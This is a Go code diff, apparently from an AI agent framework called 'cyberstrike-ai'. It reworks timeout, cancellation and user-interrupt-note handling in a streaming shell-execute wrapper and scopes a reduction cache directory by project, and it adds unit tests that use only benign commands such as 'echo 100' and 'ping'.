const maxCapture = 16 * 1024
|
|
||||||
success := true
|
success := true
|
||||||
var invokeErr error
|
var invokeErr error
|
||||||
exitCode := 0
|
exitCode := 0
|
||||||
@@ -121,6 +173,15 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
|
|||||||
if rerr != nil {
|
if rerr != nil {
|
||||||
success = false
|
success = false
|
||||||
invokeErr = rerr
|
invokeErr = rerr
|
||||||
|
// 单次 execute 超时须与 MCP 工具一致:写入工具结果尾标、继续迭代,不得向 ADK 流注入硬错误。
|
||||||
|
if einoExecuteRecvErrIsToolTimeout(rerr, tctx) {
|
||||||
|
invokeErr = context.DeadlineExceeded
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if errors.Is(rerr, context.Canceled) || (tctx != nil && errors.Is(tctx.Err(), context.Canceled)) {
|
||||||
|
invokeErr = context.Canceled
|
||||||
|
break
|
||||||
|
}
|
||||||
_ = outW.Send(nil, rerr)
|
_ = outW.Send(nil, rerr)
|
||||||
break
|
break
|
||||||
}
|
}
|
||||||
@@ -130,15 +191,10 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
|
|||||||
exitCode = *resp.ExitCode
|
exitCode = *resp.ExitCode
|
||||||
}
|
}
|
||||||
var appended string
|
var appended string
|
||||||
if remain := maxCapture - sb.Len(); remain > 0 {
|
if resp.Output != "" {
|
||||||
out := resp.Output
|
sb.WriteString(resp.Output)
|
||||||
if len(out) > remain {
|
appended = resp.Output
|
||||||
out = out[:remain]
|
|
||||||
}
|
|
||||||
sb.WriteString(out)
|
|
||||||
appended = out
|
|
||||||
}
|
}
|
||||||
// 仅推送写入 sb 的片段,与末尾 Fire/recordMonitor 的截断累计一致,避免最终 tool_result 短于已展示增量。
|
|
||||||
if w.outputChunk != nil && strings.TrimSpace(appended) != "" {
|
if w.outputChunk != nil && strings.TrimSpace(appended) != "" {
|
||||||
w.outputChunk("execute", tid, appended)
|
w.outputChunk("execute", tid, appended)
|
||||||
}
|
}
|
||||||
@@ -160,6 +216,21 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
|
|||||||
success = false
|
success = false
|
||||||
invokeErr = context.DeadlineExceeded
|
invokeErr = context.DeadlineExceeded
|
||||||
}
|
}
|
||||||
|
// 用户「中断并继续」终止 execute:合并说明进工具结果(与 MCP CancelToolExecutionWithNote 一致)。
|
||||||
|
partialStreamed := sb.String()
|
||||||
|
var abortNote string
|
||||||
|
if reg != nil && conversationID != "" && (invokeErr != nil || errors.Is(tctx.Err(), context.Canceled)) {
|
||||||
|
if note := reg.TakeEinoExecuteAbortNote(conversationID); note != "" {
|
||||||
|
abortNote = note
|
||||||
|
merged := mcp.MergePartialToolOutputAndAbortNote(partialStreamed, note)
|
||||||
|
sb.Reset()
|
||||||
|
sb.WriteString(merged)
|
||||||
|
if invokeErr == nil {
|
||||||
|
success = false
|
||||||
|
invokeErr = context.Canceled
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
// ADK 从本 Pipe 拼出 tool 消息正文;仅 Notify 尾标不会进入模型上下文。超时句写入流,与 UI 一致。
|
// ADK 从本 Pipe 拼出 tool 消息正文;仅 Notify 尾标不会进入模型上下文。超时句写入流,与 UI 一致。
|
||||||
if invokeErr != nil && errors.Is(invokeErr, context.DeadlineExceeded) {
|
if invokeErr != nil && errors.Is(invokeErr, context.DeadlineExceeded) {
|
||||||
hint := "\n\n" + einoExecuteTimeoutUserHint() + "\n"
|
hint := "\n\n" + einoExecuteTimeoutUserHint() + "\n"
|
||||||
@@ -167,20 +238,22 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
|
|||||||
if w.outputChunk != nil && tid != "" {
|
if w.outputChunk != nil && tid != "" {
|
||||||
w.outputChunk("execute", tid, hint)
|
w.outputChunk("execute", tid, hint)
|
||||||
}
|
}
|
||||||
if remain := maxCapture - sb.Len(); remain > 0 {
|
sb.WriteString(hint)
|
||||||
h := hint
|
}
|
||||||
if len(h) > remain {
|
// 中断时循环内已逐行写入 stdout;此处只追加 USER INTERRUPT NOTE,避免整段输出重复。
|
||||||
h = h[:remain]
|
if invokeErr != nil && errors.Is(invokeErr, context.Canceled) && abortNote != "" {
|
||||||
}
|
if partialStreamed != "" {
|
||||||
sb.WriteString(h)
|
_ = outW.Send(&filesystem.ExecuteResponse{Output: "\n\n" + mcp.AbortNoteBannerForModel + "\n" + abortNote}, nil)
|
||||||
|
} else if text := strings.TrimSpace(sb.String()); text != "" {
|
||||||
|
_ = outW.Send(&filesystem.ExecuteResponse{Output: text + "\n"}, nil)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
if w.recordMonitor != nil {
|
if w.recordMonitor != nil {
|
||||||
w.recordMonitor(command, sb.String(), success, invokeErr)
|
w.recordMonitor(tid, command, sb.String(), success, invokeErr)
|
||||||
}
|
}
|
||||||
w.invokeNotify.Fire(tid, "execute", agentTag, success, sb.String(), invokeErr)
|
w.invokeNotify.Fire(tid, "execute", agentTag, success, sb.String(), invokeErr)
|
||||||
outW.Close()
|
outW.Close()
|
||||||
}(sr, userCmd, execCancel, execCtx)
|
}(sr, userCmd, execCancel, timeoutCancel, execCtx, convID, execReg)
|
||||||
|
|
||||||
return outR, nil
|
return outR, nil
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -0,0 +1,227 @@
|
|||||||
|
package multiagent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/einomcp"
|
||||||
|
"cyberstrike-ai/internal/mcp"
|
||||||
|
|
||||||
|
"github.com/cloudwego/eino/adk/filesystem"
|
||||||
|
"github.com/cloudwego/eino/schema"
|
||||||
|
)
|
||||||
|
|
||||||
|
type mockStreamingShell struct {
|
||||||
|
immediateErr error
|
||||||
|
recvErr error
|
||||||
|
output string
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *mockStreamingShell) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) {
|
||||||
|
if m.immediateErr != nil {
|
||||||
|
return nil, m.immediateErr
|
||||||
|
}
|
||||||
|
outR, outW := schema.Pipe[*filesystem.ExecuteResponse](4)
|
||||||
|
go func() {
|
||||||
|
defer outW.Close()
|
||||||
|
if strings.TrimSpace(m.output) != "" {
|
||||||
|
_ = outW.Send(&filesystem.ExecuteResponse{Output: m.output}, nil)
|
||||||
|
}
|
||||||
|
if m.recvErr != nil {
|
||||||
|
_ = outW.Send(nil, m.recvErr)
|
||||||
|
}
|
||||||
|
}()
|
||||||
|
return outR, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEinoExecuteRecvErrIsToolTimeout(t *testing.T) {
|
||||||
|
tctx, cancel := context.WithTimeout(context.Background(), time.Millisecond)
|
||||||
|
defer cancel()
|
||||||
|
time.Sleep(2 * time.Millisecond)
|
||||||
|
<-tctx.Done()
|
||||||
|
|
||||||
|
if !einoExecuteRecvErrIsToolTimeout(context.Canceled, tctx) {
|
||||||
|
t.Fatal("expected canceled recv with deadline exec ctx to count as tool timeout")
|
||||||
|
}
|
||||||
|
if !einoExecuteRecvErrIsToolTimeout(context.DeadlineExceeded, nil) {
|
||||||
|
t.Fatal("expected DeadlineExceeded recv without tctx")
|
||||||
|
}
|
||||||
|
if einoExecuteRecvErrIsToolTimeout(errors.New("exit status 1"), context.Background()) {
|
||||||
|
t.Fatal("unexpected timeout for generic error")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEinoStreamingShellWrap_ToolTimeoutImmediateErrIsSoft(t *testing.T) {
|
||||||
|
inner := &mockStreamingShell{immediateErr: context.DeadlineExceeded}
|
||||||
|
wrap := &einoStreamingShellWrap{
|
||||||
|
inner: inner,
|
||||||
|
toolTimeoutMinutes: 60,
|
||||||
|
}
|
||||||
|
sr, err := wrap.ExecuteStreaming(context.Background(), &filesystem.ExecuteRequest{Command: "true"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("immediate tool timeout must return soft stream, got err: %v", err)
|
||||||
|
}
|
||||||
|
defer sr.Close()
|
||||||
|
|
||||||
|
var got strings.Builder
|
||||||
|
for {
|
||||||
|
resp, rerr := sr.Recv()
|
||||||
|
if errors.Is(rerr, io.EOF) {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if rerr != nil {
|
||||||
|
t.Fatalf("outer stream must not hard-fail, got: %v", rerr)
|
||||||
|
}
|
||||||
|
if resp != nil && resp.Output != "" {
|
||||||
|
got.WriteString(resp.Output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !strings.Contains(got.String(), einoExecuteTimeoutUserHint()) {
|
||||||
|
t.Fatalf("expected timeout hint, got: %q", got.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEinoStreamingShellWrap_ToolTimeoutRecvErrIsSoft(t *testing.T) {
|
||||||
|
inner := &mockStreamingShell{recvErr: context.DeadlineExceeded}
|
||||||
|
notify := einomcp.NewToolInvokeNotifyHolder()
|
||||||
|
wrap := &einoStreamingShellWrap{
|
||||||
|
inner: inner,
|
||||||
|
invokeNotify: notify,
|
||||||
|
toolTimeoutMinutes: 60,
|
||||||
|
}
|
||||||
|
// 生产路径由 Eino compose 注入 toolCallID;单测通过已过期 execCtx 识别 tool_timeout 软错误。
|
||||||
|
tctx, cancel := context.WithTimeout(context.Background(), time.Millisecond)
|
||||||
|
defer cancel()
|
||||||
|
time.Sleep(2 * time.Millisecond)
|
||||||
|
<-tctx.Done()
|
||||||
|
|
||||||
|
sr, err := wrap.ExecuteStreaming(tctx, &filesystem.ExecuteRequest{Command: "sleep 999"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ExecuteStreaming: %v", err)
|
||||||
|
}
|
||||||
|
defer sr.Close()
|
||||||
|
|
||||||
|
var got strings.Builder
|
||||||
|
for {
|
||||||
|
resp, rerr := sr.Recv()
|
||||||
|
if errors.Is(rerr, io.EOF) {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if rerr != nil {
|
||||||
|
t.Fatalf("outer stream must not hard-fail on tool timeout, got: %v", rerr)
|
||||||
|
}
|
||||||
|
if resp != nil && resp.Output != "" {
|
||||||
|
got.WriteString(resp.Output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !strings.Contains(got.String(), einoExecuteTimeoutUserHint()) {
|
||||||
|
t.Fatalf("expected timeout hint in stream, got: %q", got.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEinoStreamingShellWrap_CapturesOutputWithToolTimeout(t *testing.T) {
|
||||||
|
inner := &mockStreamingShell{output: "100\n"}
|
||||||
|
notify := einomcp.NewToolInvokeNotifyHolder()
|
||||||
|
var firedContent string
|
||||||
|
notify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
|
||||||
|
firedContent = content
|
||||||
|
})
|
||||||
|
wrap := &einoStreamingShellWrap{
|
||||||
|
inner: inner,
|
||||||
|
invokeNotify: notify,
|
||||||
|
toolTimeoutMinutes: 60,
|
||||||
|
}
|
||||||
|
sr, err := wrap.ExecuteStreaming(context.Background(), &filesystem.ExecuteRequest{Command: "echo 100"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ExecuteStreaming: %v", err)
|
||||||
|
}
|
||||||
|
defer sr.Close()
|
||||||
|
|
||||||
|
var got strings.Builder
|
||||||
|
for {
|
||||||
|
resp, rerr := sr.Recv()
|
||||||
|
if errors.Is(rerr, io.EOF) {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if rerr != nil {
|
||||||
|
t.Fatalf("unexpected stream error: %v", rerr)
|
||||||
|
}
|
||||||
|
if resp != nil && resp.Output != "" {
|
||||||
|
got.WriteString(resp.Output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !strings.Contains(got.String(), "100") {
|
||||||
|
t.Fatalf("stream output = %q, want contains 100", got.String())
|
||||||
|
}
|
||||||
|
if !strings.Contains(firedContent, "100") {
|
||||||
|
t.Fatalf("notify content = %q, want contains 100", firedContent)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEinoStreamingShellWrap_AbortNoteDoesNotDuplicateStreamedOutput(t *testing.T) {
|
||||||
|
inner := &mockStreamingShell{output: "line1\nline2\n", recvErr: context.Canceled}
|
||||||
|
notify := einomcp.NewToolInvokeNotifyHolder()
|
||||||
|
wrap := &einoStreamingShellWrap{
|
||||||
|
inner: inner,
|
||||||
|
invokeNotify: notify,
|
||||||
|
}
|
||||||
|
reg := &abortNoteTestRegistry{note: "改成20次"}
|
||||||
|
ctx := mcp.WithEinoExecuteRunRegistry(
|
||||||
|
mcp.WithMCPConversationID(context.Background(), "conv-abort-dup"),
|
||||||
|
reg,
|
||||||
|
)
|
||||||
|
sr, err := wrap.ExecuteStreaming(ctx, &filesystem.ExecuteRequest{Command: "ping -c 10 baidu.com"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ExecuteStreaming: %v", err)
|
||||||
|
}
|
||||||
|
defer sr.Close()
|
||||||
|
|
||||||
|
var got strings.Builder
|
||||||
|
for {
|
||||||
|
resp, rerr := sr.Recv()
|
||||||
|
if errors.Is(rerr, io.EOF) {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if rerr != nil {
|
||||||
|
t.Fatalf("unexpected stream error: %v", rerr)
|
||||||
|
}
|
||||||
|
if resp != nil && resp.Output != "" {
|
||||||
|
got.WriteString(resp.Output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
out := got.String()
|
||||||
|
if strings.Count(out, "line1") != 1 || strings.Count(out, "line2") != 1 {
|
||||||
|
t.Fatalf("stream duplicated stdout: %q", out)
|
||||||
|
}
|
||||||
|
if !strings.Contains(out, "改成20次") {
|
||||||
|
t.Fatalf("stream missing abort note: %q", out)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type abortNoteTestRegistry struct {
|
||||||
|
note string
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *abortNoteTestRegistry) RegisterActiveEinoExecute(string, context.CancelFunc) {}
|
||||||
|
func (r *abortNoteTestRegistry) UnregisterActiveEinoExecute(string) {}
|
||||||
|
func (r *abortNoteTestRegistry) AbortActiveEinoExecute(string, string) bool { return false }
|
||||||
|
func (r *abortNoteTestRegistry) TakeEinoExecuteAbortNote(string) string { return r.note }
|
||||||
|
|
||||||
|
func TestEinoStreamingShellWrap_NonTimeoutRecvErrStillHard(t *testing.T) {
|
||||||
|
inner := &mockStreamingShell{recvErr: errors.New("broken pipe")}
|
||||||
|
wrap := &einoStreamingShellWrap{inner: inner}
|
||||||
|
sr, err := wrap.ExecuteStreaming(context.Background(), &filesystem.ExecuteRequest{Command: "true"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ExecuteStreaming: %v", err)
|
||||||
|
}
|
||||||
|
defer sr.Close()
|
||||||
|
|
||||||
|
_, rerr := sr.Recv()
|
||||||
|
if rerr == nil || errors.Is(rerr, io.EOF) {
|
||||||
|
t.Fatal("expected hard stream error for non-timeout failure")
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -96,6 +96,6 @@ func recordEinoADKFilesystemToolMonitor(
|
|||||||
}
|
}
|
||||||
id := ag.RecordLocalToolExecution(storedName, args, resultText, invErr)
|
id := ag.RecordLocalToolExecution(storedName, args, resultText, invErr)
|
||||||
if id != "" {
|
if id != "" {
|
||||||
rec(id)
|
rec(id, toolCallID)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -43,22 +43,6 @@ func sanitizeEinoPathSegment(s string) string {
|
|||||||
return s
|
return s
|
||||||
}
|
}
|
||||||
|
|
||||||
// localPlantaskBackend wraps the eino-ext local backend with plantask.Delete (Local has no Delete).
|
|
||||||
type localPlantaskBackend struct {
|
|
||||||
*localbk.Local
|
|
||||||
}
|
|
||||||
|
|
||||||
func (l *localPlantaskBackend) Delete(ctx context.Context, req *plantask.DeleteRequest) error {
|
|
||||||
if l == nil || l.Local == nil || req == nil {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
p := strings.TrimSpace(req.FilePath)
|
|
||||||
if p == "" {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
return os.Remove(p)
|
|
||||||
}
|
|
||||||
|
|
||||||
func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
|
func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
|
||||||
if alwaysVisible <= 0 || len(all) <= alwaysVisible+1 {
|
if alwaysVisible <= 0 || len(all) <= alwaysVisible+1 {
|
||||||
return all, nil, false
|
return all, nil, false
|
||||||
@@ -67,14 +51,7 @@ func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []t
|
|||||||
}
|
}
|
||||||
|
|
||||||
func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbackAlwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
|
func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbackAlwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
|
||||||
nameSet := make(map[string]struct{}, len(names))
|
nameSet := expandAlwaysVisibleNameSet(names)
|
||||||
for _, n := range names {
|
|
||||||
n = strings.TrimSpace(strings.ToLower(n))
|
|
||||||
if n == "" {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
nameSet[n] = struct{}{}
|
|
||||||
}
|
|
||||||
if len(nameSet) == 0 {
|
if len(nameSet) == 0 {
|
||||||
return splitToolsForToolSearch(all, fallbackAlwaysVisible)
|
return splitToolsForToolSearch(all, fallbackAlwaysVisible)
|
||||||
}
|
}
|
||||||
@@ -87,9 +64,9 @@ func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbac
|
|||||||
info, err := t.Info(context.Background())
|
info, err := t.Info(context.Background())
|
||||||
name := ""
|
name := ""
|
||||||
if err == nil && info != nil {
|
if err == nil && info != nil {
|
||||||
name = strings.TrimSpace(strings.ToLower(info.Name))
|
name = info.Name
|
||||||
}
|
}
|
||||||
if _, keep := nameSet[name]; keep {
|
if toolMatchesAlwaysVisible(name, nameSet) {
|
||||||
static = append(static, t)
|
static = append(static, t)
|
||||||
continue
|
continue
|
||||||
}
|
}
|
||||||
@@ -126,14 +103,26 @@ func mergeAlwaysVisibleToolNames(configured []string) []string {
|
|||||||
return merged
|
return merged
|
||||||
}
|
}
|
||||||
|
|
||||||
func buildReductionMiddleware(ctx context.Context, mw config.MultiAgentEinoMiddlewareConfig, convID string, loc *localbk.Local, logger *zap.Logger) (adk.ChatModelAgentMiddleware, error) {
|
func reductionCacheRootDir(configuredBase, projectID, conversationID string) string {
|
||||||
|
base := strings.TrimSpace(configuredBase)
|
||||||
|
if base == "" {
|
||||||
|
base = filepath.Join("tmp", "reduction")
|
||||||
|
}
|
||||||
|
if pid := strings.TrimSpace(projectID); pid != "" {
|
||||||
|
return filepath.Join(base, "projects", sanitizeEinoPathSegment(pid))
|
||||||
|
}
|
||||||
|
conv := strings.TrimSpace(conversationID)
|
||||||
|
if conv == "" {
|
||||||
|
conv = "default"
|
||||||
|
}
|
||||||
|
return filepath.Join(base, "conversations", sanitizeEinoPathSegment(conv))
|
||||||
|
}
|
||||||
|
|
||||||
|
func buildReductionMiddleware(ctx context.Context, mw config.MultiAgentEinoMiddlewareConfig, projectID, convID string, loc *localbk.Local, logger *zap.Logger) (adk.ChatModelAgentMiddleware, error) {
|
||||||
if loc == nil {
|
if loc == nil {
|
||||||
return nil, fmt.Errorf("reduction: local backend nil")
|
return nil, fmt.Errorf("reduction: local backend nil")
|
||||||
}
|
}
|
||||||
root := strings.TrimSpace(mw.ReductionRootDir)
|
root := reductionCacheRootDir(mw.ReductionRootDir, projectID, convID)
|
||||||
if root == "" {
|
|
||||||
root = filepath.Join(os.TempDir(), "cyberstrike-reduction", sanitizeEinoPathSegment(convID))
|
|
||||||
}
|
|
||||||
if err := os.MkdirAll(root, 0o755); err != nil {
|
if err := os.MkdirAll(root, 0o755); err != nil {
|
||||||
return nil, fmt.Errorf("reduction root: %w", err)
|
return nil, fmt.Errorf("reduction root: %w", err)
|
||||||
}
|
}
|
||||||
@@ -171,6 +160,7 @@ func prependEinoMiddlewares(
|
|||||||
einoLoc *localbk.Local,
|
einoLoc *localbk.Local,
|
||||||
skillsRoot string,
|
skillsRoot string,
|
||||||
conversationID string,
|
conversationID string,
|
||||||
|
projectID string,
|
||||||
logger *zap.Logger,
|
logger *zap.Logger,
|
||||||
) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, toolSearchActive bool, err error) {
|
) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, toolSearchActive bool, err error) {
|
||||||
if mw == nil {
|
if mw == nil {
|
||||||
@@ -190,7 +180,7 @@ func prependEinoMiddlewares(
|
|||||||
if place == einoMWSub && !mw.ReductionSubAgents {
|
if place == einoMWSub && !mw.ReductionSubAgents {
|
||||||
// skip
|
// skip
|
||||||
} else {
|
} else {
|
||||||
redMW, rerr := buildReductionMiddleware(ctx, *mw, conversationID, einoLoc, logger)
|
redMW, rerr := buildReductionMiddleware(ctx, *mw, projectID, conversationID, einoLoc, logger)
|
||||||
if rerr != nil {
|
if rerr != nil {
|
||||||
return nil, nil, false, rerr
|
return nil, nil, false, rerr
|
||||||
}
|
}
|
||||||
@@ -238,7 +228,7 @@ func prependEinoMiddlewares(
|
|||||||
if mk := os.MkdirAll(baseDir, 0o755); mk != nil {
|
if mk := os.MkdirAll(baseDir, 0o755); mk != nil {
|
||||||
return nil, nil, toolSearchActive, fmt.Errorf("plantask mkdir: %w", mk)
|
return nil, nil, toolSearchActive, fmt.Errorf("plantask mkdir: %w", mk)
|
||||||
}
|
}
|
||||||
ptBE := &localPlantaskBackend{Local: einoLoc}
|
ptBE := newLocalPlantaskBackend(einoLoc)
|
||||||
pt, perr := plantask.New(ctx, &plantask.Config{Backend: ptBE, BaseDir: baseDir})
|
pt, perr := plantask.New(ctx, &plantask.Config{Backend: ptBE, BaseDir: baseDir})
|
||||||
if perr != nil {
|
if perr != nil {
|
||||||
return nil, nil, toolSearchActive, fmt.Errorf("plantask: %w", perr)
|
return nil, nil, toolSearchActive, fmt.Errorf("plantask: %w", perr)
|
||||||
@@ -253,17 +243,14 @@ func prependEinoMiddlewares(
|
|||||||
return outTools, extraHandlers, toolSearchActive, nil
|
return outTools, extraHandlers, toolSearchActive, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func deepExtrasFromConfig(ma *config.MultiAgentConfig) (outputKey string, retry *adk.ModelRetryConfig, taskDesc func(context.Context, []adk.Agent) (string, error)) {
|
func deepExtrasFromConfig(ma *config.MultiAgentConfig) (outputKey string, taskDesc func(context.Context, []adk.Agent) (string, error)) {
|
||||||
if ma == nil {
|
if ma == nil {
|
||||||
return "", nil, nil
|
return "", nil
|
||||||
}
|
}
|
||||||
mw := ma.EinoMiddleware
|
mw := ma.EinoMiddleware
|
||||||
if k := strings.TrimSpace(mw.DeepOutputKey); k != "" {
|
if k := strings.TrimSpace(mw.DeepOutputKey); k != "" {
|
||||||
outputKey = k
|
outputKey = k
|
||||||
}
|
}
|
||||||
if mw.DeepModelRetryMaxRetries > 0 {
|
|
||||||
retry = &adk.ModelRetryConfig{MaxRetries: mw.DeepModelRetryMaxRetries}
|
|
||||||
}
|
|
||||||
prefix := strings.TrimSpace(mw.TaskToolDescriptionPrefix)
|
prefix := strings.TrimSpace(mw.TaskToolDescriptionPrefix)
|
||||||
if prefix != "" {
|
if prefix != "" {
|
||||||
taskDesc = func(ctx context.Context, agents []adk.Agent) (string, error) {
|
taskDesc = func(ctx context.Context, agents []adk.Agent) (string, error) {
|
||||||
@@ -284,5 +271,5 @@ func deepExtrasFromConfig(ma *config.MultiAgentConfig) (outputKey string, retry
|
|||||||
return prefix + "\n可用子代理(按名称 transfer / task 调用):" + strings.Join(names, "、"), nil
|
return prefix + "\n可用子代理(按名称 transfer / task 调用):" + strings.Join(names, "、"), nil
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
return outputKey, retry, taskDesc
|
return outputKey, taskDesc
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -3,12 +3,31 @@ package multiagent
|
|||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
"testing"
|
"testing"
|
||||||
|
|
||||||
"github.com/cloudwego/eino/components/tool"
|
"github.com/cloudwego/eino/components/tool"
|
||||||
"github.com/cloudwego/eino/schema"
|
"github.com/cloudwego/eino/schema"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
func TestReductionCacheRootDir(t *testing.T) {
|
||||||
|
got := reductionCacheRootDir("", "proj-1", "conv-1")
|
||||||
|
want := filepath.Join("tmp", "reduction", "projects", "proj-1")
|
||||||
|
if got != want {
|
||||||
|
t.Fatalf("project scope: got %q want %q", got, want)
|
||||||
|
}
|
||||||
|
got = reductionCacheRootDir("", "", "conv-abc")
|
||||||
|
want = filepath.Join("tmp", "reduction", "conversations", "conv-abc")
|
||||||
|
if got != want {
|
||||||
|
t.Fatalf("conversation scope: got %q want %q", got, want)
|
||||||
|
}
|
||||||
|
custom := reductionCacheRootDir("/data/cache", "p1", "c1")
|
||||||
|
if !strings.HasSuffix(custom, filepath.Join("projects", "p1")) {
|
||||||
|
t.Fatalf("custom base should still scope by project, got %q", custom)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
type stubTool struct{ name string }
|
type stubTool struct{ name string }
|
||||||
|
|
||||||
func (s stubTool) Info(_ context.Context) (*schema.ToolInfo, error) {
|
func (s stubTool) Info(_ context.Context) (*schema.ToolInfo, error) {
|
||||||
|
|||||||
@@ -7,6 +7,7 @@ import (
|
|||||||
|
|
||||||
"cyberstrike-ai/internal/agent"
|
"cyberstrike-ai/internal/agent"
|
||||||
"cyberstrike-ai/internal/config"
|
"cyberstrike-ai/internal/config"
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
|
|
||||||
"github.com/cloudwego/eino-ext/components/model/openai"
|
"github.com/cloudwego/eino-ext/components/model/openai"
|
||||||
"github.com/cloudwego/eino/adk"
|
"github.com/cloudwego/eino/adk"
|
||||||
@@ -29,7 +30,9 @@ type PlanExecuteRootArgs struct {
|
|||||||
MwCfg *config.MultiAgentEinoMiddlewareConfig
|
MwCfg *config.MultiAgentEinoMiddlewareConfig
|
||||||
// ConversationID is used for transcript/isolation paths in middleware.
|
// ConversationID is used for transcript/isolation paths in middleware.
|
||||||
ConversationID string
|
ConversationID string
|
||||||
Logger *zap.Logger
|
DB *database.DB
|
||||||
|
ProjectID string
|
||||||
|
Logger *zap.Logger
|
||||||
// ModelName is used for model input token estimation logs.
|
// ModelName is used for model input token estimation logs.
|
||||||
ModelName string
|
ModelName string
|
||||||
// ExecPreMiddlewares 是由 prependEinoMiddlewares 构建的前置中间件(patchtoolcalls, reduction, toolsearch, plantask),
|
// ExecPreMiddlewares 是由 prependEinoMiddlewares 构建的前置中间件(patchtoolcalls, reduction, toolsearch, plantask),
|
||||||
@@ -91,24 +94,20 @@ func NewPlanExecuteRoot(ctx context.Context, a *PlanExecuteRootArgs) (adk.Resuma
|
|||||||
if a.SkillMiddleware != nil {
|
if a.SkillMiddleware != nil {
|
||||||
execHandlers = append(execHandlers, a.SkillMiddleware)
|
execHandlers = append(execHandlers, a.SkillMiddleware)
|
||||||
}
|
}
|
||||||
// 4. summarization(最后,与 Deep/Supervisor 一致)
|
// 4. pre-summarization normalize + continuation dedup, then summarization (与 Deep/Supervisor 一致)
|
||||||
if a.AppCfg != nil {
|
if a.AppCfg != nil {
|
||||||
sumMw, sumErr := newEinoSummarizationMiddleware(ctx, a.ExecModel, a.AppCfg, a.MwCfg, a.ConversationID, a.Logger)
|
sumMw, sumErr := newEinoSummarizationMiddleware(ctx, a.ExecModel, a.AppCfg, a.MwCfg, a.ConversationID, a.DB, a.ProjectID, a.Logger)
|
||||||
if sumErr != nil {
|
if sumErr != nil {
|
||||||
return nil, fmt.Errorf("plan_execute executor summarization: %w", sumErr)
|
return nil, fmt.Errorf("plan_execute executor summarization: %w", sumErr)
|
||||||
}
|
}
|
||||||
execHandlers = append(execHandlers, sumMw)
|
execHandlers = appendEinoChatModelTailMiddlewares(execHandlers, einoChatModelTailConfig{
|
||||||
}
|
logger: a.Logger,
|
||||||
// 5. 孤儿 tool 消息兜底:必须挂在所有改写历史中间件(summarization/reduction/skill)之后、
|
phase: "plan_execute_executor",
|
||||||
// telemetry 之前,保证送入 ChatModel 的消息序列 tool_call ↔ tool_result 配对完整。
|
summarization: sumMw,
|
||||||
execHandlers = append(execHandlers, newOrphanToolPrunerMiddleware(a.Logger, "plan_execute_executor"))
|
modelName: a.ModelName,
|
||||||
if teleMw := newEinoModelInputTelemetryMiddleware(a.Logger, a.ModelName, a.ConversationID, "plan_execute_executor"); teleMw != nil {
|
conversationID: a.ConversationID,
|
||||||
execHandlers = append(execHandlers, teleMw)
|
trace: a.ModelFacingTrace,
|
||||||
}
|
})
|
||||||
if a.ModelFacingTrace != nil {
|
|
||||||
if capMw := newModelFacingTraceMiddleware(a.ModelFacingTrace); capMw != nil {
|
|
||||||
execHandlers = append(execHandlers, capMw)
|
|
||||||
}
|
|
||||||
}
|
}
